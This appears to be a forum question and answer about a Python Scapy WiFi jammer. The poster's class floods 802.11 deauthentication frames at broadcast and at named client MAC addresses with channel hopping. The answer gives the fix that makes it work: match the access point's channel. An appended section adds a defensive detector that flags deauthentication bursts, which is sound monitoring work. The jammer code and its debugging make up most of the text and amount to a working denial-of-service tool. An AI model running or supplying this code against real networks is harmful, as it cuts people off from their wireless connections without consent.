Wifi jammer with Scapy is not working



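So I have been trying to get this Wifi jammer working with Scapy.

I followed this very simple tutorial, which should have been enough to get it working: https://www.youtube.com/watch?v=NKqG_i6qMJM

It did not work, even though I get the same output.

Then I found this project: https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py

It does some automatic scanning and channel hopping to populate some variables. If I run it, it works just fine.

So I came up with my own code, and I think everything should work, but somehow nothing seems to happen, even though all the output looks fine.

Here is my AirJammer class (I couldn't get the code to indent correctly here, but it is correct in my actual project):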

    class AirDeauthenticator(object):

        def __init__(self):
            self.deauth_running = False
            self.running_interface = None
            self.deauth_thread = None
            self.channel_hopper_thread = None
            self.channel_lock = Lock()
            self.current_channel = 3
            self.targeted_only = False      # Flag if we only want to perform targeted deauthentication attacks
            self._burst_count = 500         # Number of sequential deauthentication packet bursts to send
            self._bssids_to_deauth = []     # MAC addresses of APs, used to send deauthentication packets to broadcast
            self._clients_to_deauth = {}    # Pairs clients to their connected AP to send targeted deauthentication attacks

        def add_bssid(self, bssid):
            self._bssids_to_deauth.append(bssid)

        def add_client(self, client, bssid):
            self._clients_to_deauth[client] = bssid

        def set_burst_count(self, count):
            self._burst_count = count

        def hop_channels(self, interface, hop_interval):
            while self.deauth_running:
                print self.current_channel
                Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
                with self.channel_lock:
                    self.current_channel += 1
                    if self.current_channel > 11:
                        self.current_channel = 1
                sleep(hop_interval)

        def deauthentication_attack(self, interface):
            # Based on:
            # https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
            packets = []
            if not self.targeted_only:
                for bssid in self._bssids_to_deauth:
                    deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
                    packets.append(deauth_packet)
            for client in self._clients_to_deauth.keys():
                bssid = self._clients_to_deauth[client]
                deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
                deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
                packets.append(deauth_packet1)
                packets.append(deauth_packet2)
            count = self._burst_count if self._burst_count > 0 else 5
            print "N Packets: {}\n".format(len(packets))
            while count >= 0:
                for packet in packets:
                    packet.show()
                    send(packet, iface = interface, count = 1, inter = 0)
                count -= 1
            self.deauth_running = False
            self.running_interface = None

        def start_deauthentication_attack(self, interface, hop_interval=5):
            self.running_interface = interface
            self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
            self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))
            self.deauth_running = True
            self.deauth_thread.start()
            self.channel_hopper_thread.start()

Here is my test code:

    deauthor = AirDeauthenticator()
    deauthor.add_bssid('00:04:CA:AC:E9:22')
    deauthor.add_client('e4:71:85:30:f5:14', '00:04:CA:AC:E9:22')
    deauthor.add_client('d8:5d:4c:9a:72:60', '00:04:CA:AC:E9:22')
    deauthor.start_deauthentication_attack('wlan1')

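The output looks fine, although I get this warning from scapy: .WARNING: Mac address to reach destination not found. Using broadcast. .WARNING: more Mac address to reach destination not found. Using broadcast.

But I see the same output with the wifijammer.py tool, and that tool still works.

Is there anything else I need to pay attention to when trying to send these packets?

I have tried putting the interface into monitor mode, but it still doesn't work.

As far as I have been able to debug, the problem really does lie in the warning message. If I unplug the USB wifi stick and plug it back in, the error does not show up the first time, but if I repeat the process it still shows up.

This did not happen when I used the wifijammer.py tool, but I have analyzed its code over and over and did not find any setup mechanism that would avoid this serious problem.

The problem was the wifi channel.

To make it work, the wifi channel has to be set to the same one as the AP (the clients will also be on that same channel).

Without this, the packets are sent on another frequency that the target device is not listening on.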
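
From the defender's side, the same channel rule applies: a monitor-mode sensor only hears deauthentication frames on the channel it is tuned to, so it has to sit on the AP's channel to see bursts like the ones discussed above. The following is an added example, not part of the original post or answer, that parses raw 802.11 management headers and flags deauthentication bursts per BSSID. It assumes frames are recorded without a radiotap header; the MAC addresses, timestamps, window and threshold are constructed for illustration.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(raw):
    return ":".join("%02x" % b for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for an 802.11 deauth frame, else None."""
    if len(frame) < 26:                      # 24-byte mgmt header + 2-byte reason
        return None
    fc = frame[0]
    # protocol version 0, type 0 (management), subtype 12 (deauthentication)
    if (fc & 0x03) != 0 or ((fc >> 2) & 0x03) != 0 or (fc >> 4) != 12:
        return None
    dst, src, bssid = (mac(frame[o:o + 6]) for o in (4, 10, 16))
    (reason,) = struct.unpack_from("<H", frame, 24)
    return dst, src, bssid, reason

def detect_floods(capture, window=1.0, threshold=10):
    """capture: iterable of (timestamp_seconds, frame_bytes); alerts keyed by addr3."""
    seen = defaultdict(list)
    for ts, frame in capture:
        rec = parse_deauth(frame)
        if rec:
            seen[rec[2]].append((ts, rec[0]))
    alerts = {}
    for bssid, events in seen.items():
        events.sort()
        start = peak = 0
        for end, (ts, _) in enumerate(events):   # sliding window over timestamps
            while ts - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:                    # threshold is an assumed tuning value
            alerts[bssid] = {"peak": peak,
                             "broadcast": any(d == BROADCAST for _, d in events)}
    return alerts

def sample_frame(dst, src, bssid, subtype=12, reason=7):
    """Constructed test input: header bytes only, as a sensor would record them."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([subtype << 4, 0, 0, 0]) + raw(dst) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

def constructed_capture():
    ap, sta, other = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:aa"
    cap = [(i * 0.01, sample_frame(BROADCAST if i % 2 else sta, ap, ap)) for i in range(30)]
    cap.append((5.0, sample_frame(sta, other, other, reason=3)))    # single ordinary deauth
    cap.append((5.1, sample_frame(BROADCAST, ap, ap, subtype=8)))   # beacon, not a deauth
    return cap
```

A single deauthentication frame is normal protocol behaviour, which is why the check keys on the rate within a window instead of on the frame type alone.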
